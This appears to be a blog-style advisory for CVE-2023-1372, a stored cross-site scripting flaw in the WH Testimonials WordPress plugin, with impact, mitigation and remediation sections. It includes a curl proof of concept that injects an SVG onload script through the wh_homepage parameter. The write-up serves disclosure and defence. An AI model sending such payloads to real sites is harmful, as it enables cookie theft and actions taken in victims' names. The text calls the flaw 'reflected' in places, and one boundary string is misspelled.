CVE-2023-1372 - WH Testimonials <= 3.0.0 - Unauthenticated Stored Cross-Site Scripting
A stored XSS vulnerability has been identified in the WH Testimonials WordPress plugin. The vulnerable parameter is "wh_homepage", which is submitted via an HTTP POST request to the add testimonial functionality of the plugin.
Table of Contents
Introduction
WH Testimonials Plugin v3.0.0 is a popular WordPress plugin used to manage and display testimonials on websites. It provides several features to customize the layout of testimonials. However, a cross-site scripting (XSS) vulnerability has been discovered in the plugin, which can allow an attacker to inject malicious code and execute it in the context of the victim's browser.
Description
The vulnerability is caused by the insufficient validation of user-supplied input in the "wh_homepage" POST parameter. An attacker can inject malicious code into this parameter, which will be reflected back to the victim when they visit the vulnerable page.
Here's The Proof Of Concept
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-H 'Content-Length: XXX' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
Impact
An attacker can exploit this vulnerability to steal sensitive information, such as cookies, session tokens, and other sensitive data. They can also perform unauthorized actions on behalf of the victim, such as modifying the victim's account settings, posting spam, or installing malware.
Exploitation
To exploit the vulnerability, an attacker can craft a malicious request with the payload mentioned above and send it to the vulnerable server. When the server processes the request, it reflects the payload back to the victim's browser, which executes the injected code. For example, the attacker can send a phishing email to the victim with a link to the vulnerable page. When the victim clicks on the link, the injected code executes, and the attacker can steal sensitive information.
Mitigation
To mitigate the vulnerability, the plugin developer should validate and sanitize user-supplied input before processing it. They should also implement output encoding to prevent malicious code injection. Additionally, users should keep their plugins and WordPress installation up to date to prevent vulnerabilities from being exploited.
Remediation
The developer should implement input validation and sanitization for all user-supplied input to prevent malicious code injection. The input received in the "wh_homepage" parameter should be sanitized to remove any potentially harmful code, such as script tags or other HTML/JavaScript markup.
References
- https://www.cve.org/CVERecord?id=CVE-2023-1372
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wh-testimonials/wh-testimonials-300-unauthenticated-stored-cross-site-scripting
Daniel Kelley Newsletter
Join the newsletter to receive the latest updates in your inbox.
